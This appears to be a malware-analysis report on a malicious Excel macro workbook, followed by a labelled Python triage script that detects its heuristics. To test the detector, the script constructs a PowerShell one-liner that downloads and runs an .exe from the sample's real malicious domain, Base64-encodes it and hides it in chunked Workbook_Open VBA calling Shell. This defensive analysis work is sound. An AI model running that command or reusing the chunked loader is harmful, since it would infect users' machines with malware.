Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 db3f92f095d2ddc0…

MALICIOUS

Office (OOXML) / .XLSM

Size: 102.9 KB
Created: 2021-08-19 14:03:52 UTC
Authoring application: Microsoft Excel 15.0300
MD5: dda42b3070fa52baa57b39cf06a45d66
SHA-1: a6a6cf4b87c71a2e47295a55f4bf149c01af42d5
SHA-256: db3f92f095d2ddc0e019b2f387bf03b04db4115162472565800f10eba26be5b1
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros that call the Shell() function to execute commands. The macros decode a Base64 string which, when run, downloads a file named 'C87b1mDlYqH306206IMG.exe' from 'http://coachcarnewilliamltd.com/' and then executes it. The VBA code also reconstructs a PowerShell command from fragments before running it, likely for further payload delivery or to evade string-based detection.

Heuristics (2)

  • OLE_VBA_SHELL [critical]: Shell() call in VBA
  • OOXML_VBA [medium]: document contains vbaProject.bin, so VBA macros are present
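
Added example (not part of this report, and not the code of the analysis engine that produced it): a standard-library Python triage script that applies the two heuristics above to an OOXML container and to extracted VBA source, reassembles a string that the macro builds from concatenated literals, Base64-decodes it (UTF-8 or UTF-16LE, the latter being what PowerShell -EncodedCommand uses), and pulls the download URL out of the result. The .xlsm container, the VBA, the PowerShell one-liner and the rule id VBA_PS_B64 are constructed for illustration and are not the sample's real contents; only the URL and file name come from the report. In practice the VBA source would come from oletools' olevba, which this script deliberately does not require.

```python
"""Offline triage for the heuristics this report fires (OOXML_VBA, OLE_VBA_SHELL)
plus surfacing of a Base64-wrapped download command. Standard library only.
All inputs built below are CONSTRUCTED to resemble the report's description;
they are not the analysed sample's actual contents."""
import base64
import io
import re
import zipfile

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
STR_LIT_RE = re.compile(r'"([^"]*)"')
# name = "lit"   or   name = name & "lit" & "lit"   (string built in chunks)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(\1\s*&\s*)?(".*)$')
SHELL_RE = re.compile(r"\bShell\s*\(")


def ooxml_has_vba(xlsm: bytes) -> bool:
    """Heuristic OOXML_VBA: a vbaProject.bin part means macros are present."""
    with zipfile.ZipFile(io.BytesIO(xlsm)) as z:
        return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())


def reassemble_strings(vba: str) -> tuple[dict, list]:
    """Rebuild strings assembled piecewise (s = "a" then s = s & "b") and collect
    literals used elsewhere (e.g. call arguments). Returns (variables, loose literals)."""
    variables, loose = {}, []
    for line in vba.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            loose.extend(STR_LIT_RE.findall(line))
            continue
        name, appending, rhs = m.group(1), bool(m.group(2)), m.group(3)
        joined = "".join(STR_LIT_RE.findall(rhs))
        variables[name] = (variables.get(name, "") if appending else "") + joined
    return variables, loose


def try_b64(s: str):
    """Return the decoded text if s is Base64 that yields printable UTF-8 or UTF-16LE
    (PowerShell -EncodedCommand takes UTF-16LE), otherwise None."""
    if not B64_RE.match(s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None


def scan_vba(vba: str) -> dict:
    """Run the macro-level heuristics over the source and over anything it decodes."""
    variables, loose = reassemble_strings(vba)
    decoded = {}
    for s in list(variables.values()) + loose:
        text = try_b64(s)
        if text:
            decoded[s] = text
    views = [vba] + list(decoded.values())
    hits = []
    if SHELL_RE.search(vba):
        hits.append(("critical", "OLE_VBA_SHELL", "Shell() call in VBA"))
    if any(re.search(r"powershell", v, re.I) for v in views):
        # rule id VBA_PS_B64 is assumed for this example, not one of the report's
        hits.append(("high", "VBA_PS_B64", "PowerShell command (after Base64 decode)"))
    urls = sorted({u for v in views for u in URL_RE.findall(v)})
    return {"heuristics": hits, "decoded": decoded, "urls": urls}


def build_sample_xlsm(vba_project: bytes) -> bytes:
    """Minimal OOXML container with an xl/vbaProject.bin part (a stub, not a real OLE stream)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", vba_project)
    return buf.getvalue()


# --- constructed inputs (URL and file name taken from the report) ----------
_PS = ("powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
       "'http://coachcarnewilliamltd.com/C87b1mDlYqH306206IMG.exe',"
       "'C:\\Users\\Public\\C87b1mDlYqH306206IMG.exe');"
       "Start-Process 'C:\\Users\\Public\\C87b1mDlYqH306206IMG.exe'\"")
_B64 = base64.b64encode(_PS.encode()).decode()
_CHUNKS = [_B64[i:i + 40] for i in range(0, len(_B64), 40)]
SAMPLE_VBA = (
    "Sub Workbook_Open()\n    Dim s As String\n"
    + f'    s = "{_CHUNKS[0]}"\n'
    + "".join(f'    s = s & "{c}"\n' for c in _CHUNKS[1:])
    + "    Call Shell(Decode(s), vbHide)\nEnd Sub\n"
)
SAMPLE_XLSM = build_sample_xlsm(b"\xd0\xcf\x11\xe0stub")


def triage(xlsm: bytes, vba_source: str) -> dict:
    """Container check plus macro scan. vba_source is what olevba would extract
    from vbaProject.bin; that dependency is avoided here."""
    report = scan_vba(vba_source)
    if ooxml_has_vba(xlsm):
        report["heuristics"].insert(0, ("medium", "OOXML_VBA", "Document contains vbaProject.bin"))
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_XLSM, SAMPLE_VBA)
    for sev, rule, desc in r["heuristics"]:
        print(f"[{sev}] {rule}: {desc}")
    print("URLs:", r["urls"])
```

The chunk reassembly is the part that matters against a sample like this one: scanning the raw macro text for "powershell" or the URL finds nothing, because both only exist inside the Base64 blob, and the blob itself only exists once the `s = s & "..."` fragments are joined.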

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas (vba-macro, 2635 bytes)
    SHA-256: ecec8d14da664575f227b29dcaf91495ce50d36d9ff7d0ff47647be8130fbdb4
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  • vbaProject_00.bin (vba-project, 6144 bytes)
    SHA-256: 51bf4e27c2fc0e6181932fc2c121de333a200309ffd0b1ef032664e8a7cfcb7b
    Source: OOXML VBA project: xl/vbaProject.bin